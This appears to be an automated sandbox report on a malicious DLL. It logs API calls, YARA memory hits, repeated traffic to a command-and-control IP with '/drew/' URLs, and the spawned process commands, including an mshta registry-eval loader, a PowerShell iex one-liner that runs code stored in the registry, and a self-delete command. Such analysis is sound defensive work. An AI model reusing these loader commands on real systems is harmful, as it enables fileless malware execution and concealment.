Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_053765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, |
2_2_053765C2 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_053799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, |
2_2_053799BC |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0538BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, |
2_2_0538BAD1 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: rundll32.exe, 00000002.00000003.326957749.0000000000606000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.431256353.0000000000606000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28// |
Source: rundll32.exe, 00000002.00000002.431133412.00000000005C5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/5hvqzMd6r/y5LAWfsJPn_2FuJNBtSD/jo9Ej88JuprJYYLjeMo/uimRol7PlJG9VvIsIL3Df8 |
Source: rundll32.exe, 00000002.00000002.431133412.00000000005C5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/cxMA0l9t0gF4nE_2FmPDw/NuY7cVTxP_2BrZjs/bmIuRT1I4IwLvEW/o6kvd44g4K1G_2FLnH |
Source: rundll32.exe, 00000002.00000002.431133412.00000000005C5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://185.189.151.28/drew/mUvYePprXz/HSjqVijdEeUR8rvJ9/cPWoN3kKWonK/lI7v_2BDaJj/aZ5n6IwN6RAkac/zBA3 |
Source: rundll32.exe, 00000002.00000003.326934628.00000000005D9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.431133412.00000000005C5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://config.edge.skype.com/ |
Source: rundll32.exe, 00000002.00000002.431133412.00000000005C5000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://config.edge.skype.com/drew/Qg8GJotjoY97QspAvP/_2F09x_2B/UENcdMq6TX9ujwqHtU8h/_2FN_2BA2P1TdW6j |
Source: rundll32.exe, 00000002.00000003.371775528.00000000057C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000003.386660010.0000026263E2C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.385093291.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.384996516.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000002.00000003.371775528.00000000057C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000003.386660010.0000026263E2C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.385093291.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.384996516.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: powershell.exe, 00000013.00000003.352250794.000002626320F000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000013.00000003.343715699.00000262636C7000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft.co |
Source: rundll32.exe, 00000002.00000003.371775528.00000000057C8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000003.386660010.0000026263E2C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.385093291.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.384996516.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: powershell.exe, 00000013.00000003.343715699.00000262636C7000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.micr. |
Source: Yara match |
File source: 00000002.00000003.271978374.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.319141424.00000000048AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272282667.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000013.00000003.386660010.0000026263E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.317438075.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271906753.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000003.385093291.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.371775528.00000000057C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271848621.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318449865.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000003.384996516.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271686999.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271578012.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272197057.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272332634.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 6596, type: MEMORYSTR |
Source: Yara match |
File source: 2.2.rundll32.exe.fb0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.e294a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.e294a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.49aa4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.49aa4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4a56b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4a294a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.430345543.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.382198486.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.383295938.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.384393230.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.433324179.000000000472F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318295825.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.442468784.0000000005370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318372991.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271978374.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.319141424.00000000048AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272282667.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000013.00000003.386660010.0000026263E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.317438075.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271906753.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000003.385093291.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.371775528.00000000057C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271848621.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318449865.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000003.384996516.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271686999.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271578012.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272197057.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272332634.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 6596, type: MEMORYSTR |
Source: Yara match |
File source: 2.2.rundll32.exe.fb0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.e294a0.10.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.e294a0.10.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.49aa4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.49aa4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4a56b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 2.3.rundll32.exe.4a294a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match |
File source: 00000002.00000003.430345543.0000000000E29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.382198486.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.383295938.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000000.384393230.00000000001C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.433324179.000000000472F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318295825.00000000049AA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000002.442468784.0000000005370000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318372991.0000000004A29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_00FB4321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
2_2_00FB4321 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_00FB6D0A NtMapViewOfSection, |
2_2_00FB6D0A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_00FB190C GetProcAddress,NtCreateSection,memset, |
2_2_00FB190C |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_00FB84C1 NtQueryVirtualMemory, |
2_2_00FB84C1 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05386DE0 memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset, |
2_2_05386DE0 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0537C431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
2_2_0537C431 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_053774AE NtQueryInformationProcess, |
2_2_053774AE |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05380782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
2_2_05380782 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0538BE80 NtMapViewOfSection, |
2_2_0538BE80 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0537710A GetProcAddress,NtCreateSection,memset, |
2_2_0537710A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05387950 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
2_2_05387950 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_053861AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
2_2_053861AE |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0538A806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
2_2_0538A806 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_053800DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
2_2_053800DC |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05382331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
2_2_05382331 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05385312 NtWriteVirtualMemory,VirtualProtectEx,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError, |
2_2_05385312 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_053764C4 memset,NtQueryInformationProcess, |
2_2_053764C4 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0537D77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
2_2_0537D77A |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0537B7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
2_2_0537B7D5 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_053736BB NtGetContextThread,RtlNtStatusToDosError, |
2_2_053736BB |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05383829 NtQuerySystemInformation,RtlNtStatusToDosError, |
2_2_05383829 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_053710C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
2_2_053710C7 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_05385220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
2_2_05385220 |
Source: C:\Windows\SysWOW64\rundll32.exe |
Code function: 2_2_0538EAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
2_2_0538EAC5 |
Source: unknown |
Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\XoVzWJQAQ0.dll" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\XoVzWJQAQ0.dll",#1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\XoVzWJQAQ0.dll",#1 |
|
Source: unknown |
Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Hli6='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hli6).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
|
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name elbnsvbf -value gp; new-alias -name dbiansi -value iex; dbiansi ([System.Text.Encoding]::ASCII.GetString((elbnsvbf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\suyq54bl.cmdline |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES99B1.tmp" "c:\Users\user\AppData\Local\Temp\CSCA3AF429E64284F6FBA5C7EF0C7D44D.TMP" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\que4qvkg.cmdline |
|
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
|
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB529.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B2F5B9E5B5E42FBBCD6AAD130D3A7FD.TMP" |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\XoVzWJQAQ0.dll |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1BBD.bi1" |
|
Source: C:\Windows\System32\loaddll32.exe |
Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\XoVzWJQAQ0.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\XoVzWJQAQ0.dll",#1 |
Jump to behavior |
Source: C:\Windows\SysWOW64\rundll32.exe |
Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Jump to behavior |
Source: C:\Windows\System32\mshta.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name elbnsvbf -value gp; new-alias -name dbiansi -value iex; dbiansi ([System.Text.Encoding]::ASCII.GetString((elbnsvbf "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\suyq54bl.cmdline |
Jump to behavior |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\que4qvkg.cmdline |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES99B1.tmp" "c:\Users\user\AppData\Local\Temp\CSCA3AF429E64284F6FBA5C7EF0C7D44D.TMP" |
Jump to behavior |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB529.tmp" "c:\Users\user\AppData\Local\Temp\CSC8B2F5B9E5B5E42FBBCD6AAD130D3A7FD.TMP" |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\XoVzWJQAQ0.dll |
Jump to behavior |
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\System32\cmd.exe cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1BBD.bi1" |
Jump to behavior |
Source: C:\Windows\System32\cmd.exe |
Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Jump to behavior |
Source: Yara match |
File source: 00000002.00000003.271978374.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.319141424.00000000048AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272282667.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000013.00000003.386660010.0000026263E2C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.317438075.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271906753.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000003.385093291.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.371775528.00000000057C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271848621.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.318449865.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000019.00000003.384996516.00000282F52DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271686999.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.271578012.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272197057.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: 00000002.00000003.272332634.0000000004AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match |
File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: powershell.exe PID: 6000, type: MEMORYSTR |
Source: Yara match |
File source: Process Memory Space: control.exe PID: 6596, type: MEMORYSTR |
Source: Yara match |
File source: 2.2.rundll32.exe.fb0000.0.unpack, type: UNPACKEDPE |
Source: Yara match |
